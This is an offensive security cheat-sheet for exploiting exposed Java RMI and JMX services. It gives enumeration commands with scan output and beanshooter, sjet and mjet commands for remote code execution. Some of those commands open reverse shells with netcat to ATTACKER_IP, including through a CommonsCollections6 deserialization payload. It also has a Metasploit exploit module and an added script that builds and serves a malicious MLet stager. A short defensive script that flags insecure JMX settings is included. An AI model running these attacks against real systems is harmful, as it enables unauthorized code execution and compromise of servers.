
Java RMI

Java RMI (Remote Method Invocation) is a Java API that allows an object running in one JVM (Java Virtual Machine) to invoke methods on an object running in another JVM, possibly on a different physical machine. RMI is the basis of Java's distributed computing and also the transport behind other Java services, most notably remote JMX (the jmxrmi binding that shows up in registry dumps), which is what most of the attacks below target.

Enumeration

  • Using nmap:

    $ nmap -sV --script "rmi-dumpregistry or rmi-vuln-classloader" -p TARGET_PORT TARGET_IP -Pn -v
    1089/tcp open  java-rmi Java RMI
    | rmi-vuln-classloader:
    |   RMI registry default configuration remote code execution vulnerability
    |     State: VULNERABLE
    |       Default configuration of RMI registry allows loading classes from remote URLs which can lead to remote code execution.
    | rmi-dumpregistry:
    |   jmxrmi

  • Using remote-method-guesser:

    $ rmg scan --ports 0-65535
    [+] Scanning 6225 Ports on for RMI services.
    [+]   [HIT] Found RMI service(s) on (DGC)
    [+]   [HIT] Found RMI service(s) on  (Registry, DGC)
    [+]   [HIT] Found RMI service(s) on  (Registry, Activator, DGC)
    [+]   [6234 / 6234] [#############################] 100%
    [+] Portscan finished.
    $ rmg enum 9010
    [+] RMI registry bound names:
    [+]   - plain-server2
    [+]       --> de.qtc.rmg.server.interfaces.IPlainServer (unknown class)
    [+]           Endpoint: ObjID: [-af587e6:17d6f7bb318:-7ff7, 9040809218460289711]
    [+]   - legacy-service
    [+]       --> de.qtc.rmg.server.legacy.LegacyServiceImpl_Stub (unknown class)
    [+]           Endpoint: ObjID: [-af587e6:17d6f7bb318:-7ffc, 4854919471498518309]
    [+]   - plain-server
    [+]       --> de.qtc.rmg.server.interfaces.IPlainServer (unknown class)
    [+]           Endpoint: ObjID: [-af587e6:17d6f7bb318:-7ff8, 6721714394791464813]

  • Using Metasploit

    use auxiliary/scanner/misc/java_rmi_server
    set RHOSTS <IPs>
    set RPORT <PORT>
    run


If a Java Remote Method Invocation (RMI) service is poorly configured, it is exposed to several Remote Code Execution (RCE) paths. One of them targets JMX exposed over RMI: the attacker hosts an MLet file and directs the JMX service to load MBeans from that remote server, which tools such as mjet or sjet automate. The newer remote-method-guesser (rmg) combines RMI service enumeration with checks for the known attack techniques, and its companion beanshooter covers the JMX-specific ones.

RCE using beanshooter

  • List available attributes: beanshooter info TARGET_IP 9010
  • Display value of an attribute: beanshooter attr TARGET_IP 9010 java.lang:type=Memory Verbose
  • Set the value of an attribute: beanshooter attr TARGET_IP 9010 java.lang:type=Memory Verbose true --type boolean
  • Bruteforce a password protected JMX service: beanshooter brute TARGET_IP 1090
  • List registered MBeans: beanshooter list TARGET_IP 9010
  • Deploy an MBean (the JAR is fetched by the target from the stager URL, so it must be reachable from there): beanshooter deploy TARGET_IP 9010 non.existing.example.ExampleBean qtc.test:type=Example --jar-file exampleBean.jar --stager-url http://ATTACKER_IP:8000
  • Enumerate JMX endpoint: beanshooter enum TARGET_IP 1090
  • Invoke a method on an MBean (here vmVersion() of the DiagnosticCommand MBean): beanshooter invoke TARGET_IP 1090 com.sun.management:type=DiagnosticCommand --signature 'vmVersion()'
  • Invoke arbitrary public and static Java methods (deploy a model MBean wrapping a java.io.File, then call list() on it):
    beanshooter model TARGET_IP 9010 de.qtc.beanshooter:version=1 'new java.io.File("/")'
    beanshooter invoke TARGET_IP 9010 de.qtc.beanshooter:version=1 --signature 'list()'
  • Standard MBean execution: beanshooter standard TARGET_IP 9010 exec 'nc ATTACKER_IP 4444 -e ash'
  • Deserialization attacks on a JMX endpoint: beanshooter serial TARGET_IP 1090 CommonsCollections6 "nc ATTACKER_IP 4444 -e ash" --username admin --password admin

RCE using sjet or mjet

Requirements:

  • Jython (both tools are Jython scripts)
  • The JMX server can connect to an HTTP service controlled by the attacker
  • JMX authentication is not enabled
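The last requirement is a server-side setting, so it is worth being able to spot it from the defender's (or the post-exploitation) side too. The following shell snippet is an added example, not code from the original page or from sjet/mjet: it classifies a JVM command line by its com.sun.management.jmxremote.* flags. It relies on the JDK defaults, which are authenticate=true and ssl=true, so only an explicit false opens the service. The three process lines are constructed for the example.

```shell
#!/bin/sh
# Added example, not from the original page: check JVM command lines (as seen
# in ps output) for the JMX settings that make the attacks on this page
# possible. The sample process lines below are constructed for this example.

# jmx_flag <cmdline> <property>: value of -Dcom.sun.management.jmxremote.<property>=..., empty if absent
jmx_flag() {
    printf '%s\n' "$1" | tr ' ' '\n' | sed -n "s/^-Dcom\.sun\.management\.jmxremote\.$2=//p"
}

# jmx_exposure <cmdline>: prints
#   none      - no remote JMX port configured (jmxremote alone is local only)
#   insecure  - remote JMX with authentication or TLS explicitly disabled
#   hardened  - remote JMX with the JDK defaults (authenticate=true, ssl=true) left on
jmx_exposure() {
    port=$(jmx_flag "$1" port)
    [ -n "$port" ] || { echo none; return 0; }
    auth=$(jmx_flag "$1" authenticate)
    ssl=$(jmx_flag "$1" ssl)
    if [ "$auth" = false ] || [ "$ssl" = false ]; then
        echo insecure
    else
        echo hardened
    fi
}

# Constructed sample lines in the shape of `ps -o pid=,args=` output
SAMPLE_PS='1234 java -Dcom.sun.management.jmxremote.port=9010 -Dcom.sun.management.jmxremote.authenticate=false -Dcom.sun.management.jmxremote.ssl=false -jar app.jar
2345 java -Dcom.sun.management.jmxremote.port=9010 -Dcom.sun.management.jmxremote.password.file=/etc/jmx/jmxremote.password -Dcom.sun.management.jmxremote.access.file=/etc/jmx/jmxremote.access -Djavax.net.ssl.keyStore=/etc/jmx/keystore -jar app.jar
3456 java -Dcom.sun.management.jmxremote -jar app.jar'

# scan_ps: read "<pid> <cmdline>" lines on stdin, print "<pid> <classification>" per line
scan_ps() {
    while read -r pid cmd; do
        echo "$pid $(jmx_exposure "$cmd")"
    done
}

# On a live host: ps -o pid=,args= -C java | scan_ps
printf '%s\n' "$SAMPLE_PS" | scan_ps
```

The first sample line is the configuration every tool on this page wants to find; the second is the minimum for a remote-reachable JMX port (password and access files plus a keystore for TLS). Note that authentication alone does not stop the serial/deserialize attacks shown further down on JDKs that deserialize the login credentials before checking them; that needs a JVM-level serialization filter (jdk.serialFilter) as well.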

Remote Command Execution

The attack involves the following steps:

  • Start a web server that hosts the MLet file and a JAR file containing the malicious MBean.
  • Create an instance of the javax.management.loading.MLet MBean on the target server, using JMX.
  • Invoke the getMBeansFromURL method of that MLet instance, passing the web server URL as parameter. The JMX service connects to the HTTP server and parses the MLet file.
  • The JMX service downloads and loads the JAR files referenced in the MLet file, making the malicious MBean available over JMX.
  • Finally, invoke methods of the malicious MBean (typically a command execution method).
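The first step is the only part of the procedure the attacker has to build by hand when not using a tool. The following shell snippet is an added example, not code from the original page or from sjet/mjet: it writes the MLet file in the format the MLet loader parses and serves it next to the JAR. The names evil.jar, com.example.Evil and the ObjectName MLetCompromise:name=evil,id=1 are placeholders chosen for this example; http://ATTACKER_IP:8000 is the page's own placeholder for the stager URL.

```shell
#!/bin/sh
# Added example (not part of the original page, nor sjet/mjet code): the
# attacker-side stager for the MLet steps above. It writes the MLet file the
# target fetches with getMBeansFromURL and serves it next to the JAR.
# Placeholders chosen for this example: evil.jar, com.example.Evil and the
# ObjectName MLetCompromise:name=evil,id=1.

# write_mlet <outfile> <codebase-url> <jar> <mbean-class> <objectname>
# The MLet loader reads an HTML-like file; code, archive, name and codebase
# are the attributes javax.management.loading.MLet looks for. codebase is
# where it fetches the archive from, so it must be reachable from the target.
write_mlet() {
    out=$1; codebase=$2; jar=$3; cls=$4; name=$5
    cat > "$out" <<EOF
<html><mlet code="$cls" archive="$jar" name="$name" codebase="$codebase"></mlet></html>
EOF
}

# mlet_ok <file>: sanity check before serving; returns 0 if the file declares
# a class, a .jar archive and an http(s) codebase.
mlet_ok() {
    grep -q '<mlet code="[^"]*" archive="[^"]*\.jar" name="[^"]*" codebase="https*://[^"]*">' "$1"
}

# serve_stager <dir> <port>: host <dir>/mlet and the JAR with python3's
# built-in server; the JMX service requests "/mlet" first, then the archive.
serve_stager() {
    dir=$1; port=$2
    mlet_ok "$dir/mlet" 2>/dev/null || { echo "no valid mlet file in $dir" >&2; return 1; }
    ls "$dir"/*.jar >/dev/null 2>&1 || { echo "no jar in $dir" >&2; return 1; }
    (cd "$dir" && python3 -m http.server "$port")
}

# Stand-alone run: build the file in a temp dir and show it (no server started).
# For the real thing: copy evil.jar into that dir and run  serve_stager "$d" 8000
d=$(mktemp -d)
write_mlet "$d/mlet" http://ATTACKER_IP:8000 evil.jar com.example.Evil 'MLetCompromise:name=evil,id=1'
cat "$d/mlet"
```

The URL passed to getMBeansFromURL is then http://ATTACKER_IP:8000/mlet, and the MBean becomes reachable under the ObjectName given in the name attribute.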

Exploit the JMX using siberas/sjet or mogwailabs/mjet

sjet syntax (password before the mode):

jython sjet.py TARGET_IP TARGET_PORT super_secret install http://ATTACKER_IP:8000 8000
jython sjet.py TARGET_IP TARGET_PORT super_secret command "ls -la"
jython sjet.py TARGET_IP TARGET_PORT super_secret shell
jython sjet.py TARGET_IP TARGET_PORT super_secret password this-is-the-new-password
jython sjet.py TARGET_IP TARGET_PORT super_secret uninstall

mjet syntax (mode before the password; the deserialize mode is mjet's):

jython mjet.py TARGET_IP TARGET_PORT install super_secret http://ATTACKER_IP:8000 8000
jython mjet.py TARGET_IP TARGET_PORT command super_secret "whoami"
jython mjet.py TARGET_IP TARGET_PORT shell super_secret
jython mjet.py --jmxrole admin --jmxpassword adminpassword TARGET_IP TARGET_PORT deserialize CommonsCollections6 "touch /tmp/xxx"

RCE using Metasploit

use exploit/multi/misc/java_rmi_server
set RHOSTS <IPs>
set RPORT <PORT>
# configure also the payload (and LHOST/LPORT) if needed
run